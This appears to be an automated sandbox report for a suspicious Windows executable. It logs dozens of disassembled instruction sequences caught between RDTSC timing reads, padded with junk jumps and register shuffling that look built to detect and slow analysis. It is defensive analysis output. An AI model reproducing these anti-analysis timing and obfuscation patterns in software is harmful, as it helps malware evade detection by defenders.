Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0AB9 second address: 76C0B06 instructions: 0x00000000 rdtsc 0x00000002 mov dx, B096h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8C1CD63247h 0x0000000d popad 0x0000000e push 00000001h 0x00000010 pushad 0x00000011 mov eax, 1A99771Bh 0x00000016 mov bl, al 0x00000018 popad 0x00000019 push ebp 0x0000001a jmp 00007F8C1CD63248h 0x0000001f mov dword ptr [esp], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov bh, ch 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0B06 second address: 76C0B38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20402h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C1CD20407h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0B38 second address: 76C0B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0B3E second address: 76C0B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0B76 second address: 76C0B93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0B93 second address: 76C0BB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C1CD203FDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0BB9 second address: 76C0C28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F8C1CD6323Ch 0x00000012 sub cx, 2958h 0x00000017 jmp 00007F8C1CD6323Bh 0x0000001c popfd 0x0000001d mov ax, 3E0Fh 0x00000021 popad 0x00000022 js 00007F8C8B8E1D05h 0x00000028 jmp 00007F8C1CD63242h 0x0000002d mov eax, dword ptr [ebp-0Ch] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F8C1CD63247h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0C28 second address: 76C0C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007F8C1CD203FEh 0x00000011 lea eax, dword ptr [ebx+78h] 0x00000014 pushad 0x00000015 pushad 0x00000016 call 00007F8C1CD203FCh 0x0000001b pop ecx 0x0000001c movsx edx, si 0x0000001f popad 0x00000020 mov al, E9h 0x00000022 popad 0x00000023 push 00000001h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F8C1CD20402h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0C85 second address: 76C0CD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 76B4h 0x00000007 mov dl, 4Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F8C1CD63241h 0x00000014 or esi, 3D00D526h 0x0000001a jmp 00007F8C1CD63241h 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 call 00007F8C1CD6323Ah 0x0000002a pop eax 0x0000002b movsx edx, si 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0CD1 second address: 76C0D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F8C1CD203FEh 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 jmp 00007F8C1CD20400h 0x00000017 nop 0x00000018 jmp 00007F8C1CD20400h 0x0000001d push eax 0x0000001e jmp 00007F8C1CD203FBh 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0D28 second address: 76C0D43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63247h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0E05 second address: 76C0E25 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 0071633Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a lea eax, dword ptr [ebx+70h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8C1CD20401h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0E25 second address: 76C0E35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD6323Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0E35 second address: 76C0E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0E39 second address: 76C0E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C1CD6323Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0E4F second address: 76C0E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0E5E second address: 76C0E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F8C1CD63247h 0x0000000a sub esi, 3665C37Eh 0x00000010 jmp 00007F8C1CD63249h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0E9B second address: 76C0EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0EA1 second address: 76C0EA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0EA5 second address: 76C0F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F8C1CD20400h 0x00000014 xor ecx, 3DF575A8h 0x0000001a jmp 00007F8C1CD203FBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F8C1CD20408h 0x00000026 jmp 00007F8C1CD20405h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0F06 second address: 76C0F5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c jmp 00007F8C1CD6323Eh 0x00000011 nop 0x00000012 pushad 0x00000013 push eax 0x00000014 mov ecx, edi 0x00000016 pop edi 0x00000017 mov si, ABE5h 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F8C1CD6323Ch 0x00000026 adc cx, 07F8h 0x0000002b jmp 00007F8C1CD6323Bh 0x00000030 popfd 0x00000031 push ecx 0x00000032 pop ebx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0F5C second address: 76C0F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD20400h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0FFB second address: 76C103F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edi, ax 0x00000011 pushfd 0x00000012 jmp 00007F8C1CD63244h 0x00000017 adc cx, 7638h 0x0000001c jmp 00007F8C1CD6323Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C103F second address: 76C107E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F8C8B89EA49h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8C1CD20408h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C107E second address: 76C1084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1084 second address: 76C10D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 mov ch, 38h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebp-14h] 0x0000000d jmp 00007F8C1CD203FBh 0x00000012 mov ecx, esi 0x00000014 pushad 0x00000015 push eax 0x00000016 movsx ebx, si 0x00000019 pop ecx 0x0000001a push edx 0x0000001b mov edx, eax 0x0000001d pop eax 0x0000001e popad 0x0000001f mov dword ptr [esi+0Ch], eax 0x00000022 jmp 00007F8C1CD203FBh 0x00000027 mov edx, 762C06ECh 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F8C1CD20400h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C10D0 second address: 76C10D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C10D6 second address: 76C10DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C10DC second address: 76C112D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63248h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushfd 0x00000013 jmp 00007F8C1CD63248h 0x00000018 xor ecx, 6BFF1BA8h 0x0000001e jmp 00007F8C1CD6323Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C112D second address: 76C11DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8C1CD203FFh 0x00000009 sbb al, FFFFFFEEh 0x0000000c jmp 00007F8C1CD20409h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F8C1CD20400h 0x00000018 jmp 00007F8C1CD20405h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 lock cmpxchg dword ptr [edx], ecx 0x00000025 pushad 0x00000026 mov si, BCF3h 0x0000002a pushfd 0x0000002b jmp 00007F8C1CD20408h 0x00000030 or ecx, 3EC62DF8h 0x00000036 jmp 00007F8C1CD203FBh 0x0000003b popfd 0x0000003c popad 0x0000003d pop edi 0x0000003e pushad 0x0000003f mov si, 674Bh 0x00000043 push eax 0x00000044 mov bl, B8h 0x00000046 pop ecx 0x00000047 popad 0x00000048 test eax, eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F8C1CD20402h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C11DD second address: 76C11E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C11E3 second address: 76C11E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C11E7 second address: 76C128C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F8C8B8E1723h 0x0000000e jmp 00007F8C1CD63249h 0x00000013 mov edx, dword ptr [ebp+08h] 0x00000016 jmp 00007F8C1CD6323Eh 0x0000001b mov eax, dword ptr [esi] 0x0000001d jmp 00007F8C1CD63240h 0x00000022 mov dword ptr [edx], eax 0x00000024 pushad 0x00000025 mov dh, ch 0x00000027 pushad 0x00000028 call 00007F8C1CD63249h 0x0000002d pop ecx 0x0000002e mov si, dx 0x00000031 popad 0x00000032 popad 0x00000033 mov eax, dword ptr [esi+04h] 0x00000036 pushad 0x00000037 movsx edx, ax 0x0000003a pushfd 0x0000003b jmp 00007F8C1CD63242h 0x00000040 add ecx, 613DE108h 0x00000046 jmp 00007F8C1CD6323Bh 0x0000004b popfd 0x0000004c popad 0x0000004d mov dword ptr [edx+04h], eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C128C second address: 76C1290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1290 second address: 76C1294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1294 second address: 76C129A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C129A second address: 76C12C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov al, F6h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8C1CD63249h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C12C4 second address: 76C12CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C12CA second address: 76C1318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8C1CD6323Ah 0x00000009 sub eax, 61F840F8h 0x0000000f jmp 00007F8C1CD6323Bh 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+08h], eax 0x0000001d pushad 0x0000001e mov si, 5C27h 0x00000022 mov cl, 93h 0x00000024 popad 0x00000025 mov eax, dword ptr [esi+0Ch] 0x00000028 pushad 0x00000029 mov ax, bx 0x0000002c mov dh, 15h 0x0000002e popad 0x0000002f mov dword ptr [edx+0Ch], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F8C1CD6323Fh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1318 second address: 76C1362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c jmp 00007F8C1CD203FEh 0x00000011 mov dword ptr [edx+10h], eax 0x00000014 jmp 00007F8C1CD20400h 0x00000019 mov eax, dword ptr [esi+14h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1362 second address: 76C1366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1366 second address: 76C1383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1383 second address: 76C13B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F8C1CD63243h 0x00000014 push esi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C13B4 second address: 76C13E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C1CD203FBh 0x00000008 mov ebx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+18h] 0x00000010 jmp 00007F8C1CD20402h 0x00000015 mov dword ptr [edx+18h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C13E5 second address: 76C13E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C13E9 second address: 76C13EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C13EF second address: 76C14B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63244h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushfd 0x0000000f jmp 00007F8C1CD6323Dh 0x00000014 adc eax, 533A59E6h 0x0000001a jmp 00007F8C1CD63241h 0x0000001f popfd 0x00000020 pop eax 0x00000021 call 00007F8C1CD63241h 0x00000026 jmp 00007F8C1CD63240h 0x0000002b pop ecx 0x0000002c popad 0x0000002d mov dword ptr [edx+1Ch], eax 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F8C1CD63247h 0x00000037 and eax, 6D5B5A7Eh 0x0000003d jmp 00007F8C1CD63249h 0x00000042 popfd 0x00000043 jmp 00007F8C1CD63240h 0x00000048 popad 0x00000049 mov eax, dword ptr [esi+20h] 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f mov cx, bx 0x00000052 mov di, A8BCh 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C14B1 second address: 76C14FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C1CD20400h 0x00000008 mov eax, 50B00731h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [edx+20h], eax 0x00000013 pushad 0x00000014 push esi 0x00000015 mov dh, 35h 0x00000017 pop ecx 0x00000018 jmp 00007F8C1CD203FBh 0x0000001d popad 0x0000001e mov eax, dword ptr [esi+24h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8C1CD20405h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C14FA second address: 76C1500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1500 second address: 76C1504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1504 second address: 76C15C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63243h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+24h], eax 0x0000000e jmp 00007F8C1CD63246h 0x00000013 mov eax, dword ptr [esi+28h] 0x00000016 pushad 0x00000017 push ecx 0x00000018 pushfd 0x00000019 jmp 00007F8C1CD6323Dh 0x0000001e sbb ah, FFFFFFE6h 0x00000021 jmp 00007F8C1CD63241h 0x00000026 popfd 0x00000027 pop eax 0x00000028 pushfd 0x00000029 jmp 00007F8C1CD63241h 0x0000002e add ah, 00000046h 0x00000031 jmp 00007F8C1CD63241h 0x00000036 popfd 0x00000037 popad 0x00000038 mov dword ptr [edx+28h], eax 0x0000003b jmp 00007F8C1CD6323Eh 0x00000040 mov ecx, dword ptr [esi+2Ch] 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F8C1CD6323Dh 0x0000004c sub si, 8656h 0x00000051 jmp 00007F8C1CD63241h 0x00000056 popfd 0x00000057 mov bx, si 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C15C7 second address: 76C162D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 5ADEh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [edx+2Ch], ecx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pushfd 0x00000012 jmp 00007F8C1CD203FCh 0x00000017 adc ch, FFFFFFA8h 0x0000001a jmp 00007F8C1CD203FBh 0x0000001f popfd 0x00000020 pop eax 0x00000021 push edi 0x00000022 call 00007F8C1CD20404h 0x00000027 pop eax 0x00000028 pop edx 0x00000029 popad 0x0000002a mov ax, word ptr [esi+30h] 0x0000002e pushad 0x0000002f mov edx, eax 0x00000031 mov si, 887Fh 0x00000035 popad 0x00000036 mov word ptr [edx+30h], ax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F8C1CD203FCh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C162D second address: 76C1633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1633 second address: 76C1639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1639 second address: 76C163D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C163D second address: 76C165B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C1CD203FEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C165B second address: 76C166A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C166A second address: 76C16BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F8C1CD20403h 0x00000016 jmp 00007F8C1CD20403h 0x0000001b popfd 0x0000001c mov ax, CFFFh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C16BB second address: 76C171C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 1FF6h 0x00000007 mov esi, edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+34h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F8C1CD6323Fh 0x00000016 or cx, 307Eh 0x0000001b jmp 00007F8C1CD63249h 0x00000020 popfd 0x00000021 call 00007F8C1CD63240h 0x00000026 mov eax, 4F9A3A51h 0x0000002b pop ecx 0x0000002c popad 0x0000002d mov dword ptr [edx+34h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C171C second address: 76C1722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1722 second address: 76C1726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1726 second address: 76C174A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C1CD20404h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C174A second address: 76C1750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
